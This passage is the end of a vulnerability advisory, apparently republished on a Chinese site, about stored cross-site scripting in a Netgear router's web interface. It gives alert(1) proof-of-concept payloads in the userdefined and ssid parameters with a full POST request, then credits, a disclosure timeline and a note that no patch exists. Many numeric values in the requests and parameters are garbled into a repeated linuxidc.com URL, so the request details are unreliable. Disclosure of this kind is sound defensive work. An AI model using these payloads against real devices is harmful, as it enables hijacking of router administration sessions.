userdefined="><img src="https://www.linuxidc.com/Linux/2013-02/0" onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=https://www.linuxidc.com/Linux/2013-02/0
You could also change the request method to HTTP GET:
?userdefined="><img%20src="https://www.linuxidc.com/Linux/2013-02/0"%20onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=https://www.linuxidc.com/Linux/2013-02/0
The scriptcode gets executed if you try to edit this service again.
Screenshot:
* stored XSS:
Injecting scripts into the parameter ssid mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
-> Wireless-Konfiguration -> Netzwerkname (SSID)
Param: ssid
POST /wlg_sec_profile_main.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=https://www.linuxidc.com/Linux/2013-02/0.9,*/*;q=https://www.linuxidc.com/Linux/2013-02/0.8
Accept-Language: de-de,de;q=https://www.linuxidc.com/Linux/2013-02/0.8,en-us;q=https://www.linuxidc.com/Linux/2013-02/0.5,en;q=https://www.linuxidc.com/Linux/2013-02/0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
Cookie: uid=vjkqK779eJ
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 328
ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253&WRegion=5&w_channel=https://www.linuxidc.com/Linux/2013-02/0&opmode=20n&enable_ap=1&enable_ssid_bc=1&security_type=AUTO-PSK&passphrase=friendlytrain824&Apply=%C3%9Cbernehmen&tempSetting=https://www.linuxidc.com/Linux/2013-02/0&tempRegion=5&initChannel=https://www.linuxidc.com/Linux/2013-02/0&h_opmode=20n&wds_enable=https://www.linuxidc.com/Linux/2013-02/0&ver_type=WW&pfChanged=https://www.linuxidc.com/Linux/2013-02/0&ssid_sel_submit=https://www.linuxidc.com/Linux/2013-02/0&secure_sel_submit=https://www.linuxidc.com/Linux/2013-02/0
============ Solution ============
No known solution available.
============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Twitter: @s3cur1ty_de
============ Time Line: ============
17.12.2012 - discovered vulnerability
18.12.2012 - Privately reported all details to vendor
18.12.2012 - vendor responded that they will check the reported vulnerability details
29.01.2013 - vendor contacted me to test a new firmware
29.01.2013 - /me responded that I need more details about the fixes before I will test the new firmware
30.01.2013 - vendor reponded that I should just check it
31.01.2013 - /me responded that I will not check the firmware if they do not provide more details (do not waste my time again!)
11.02.2013 - vendor responded that he has to declare it internally
15.02.2013 - public release
===================== Advisory end =====================
建议:
--------------------------------------------------------------------------------
厂商补丁:
Netgear
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: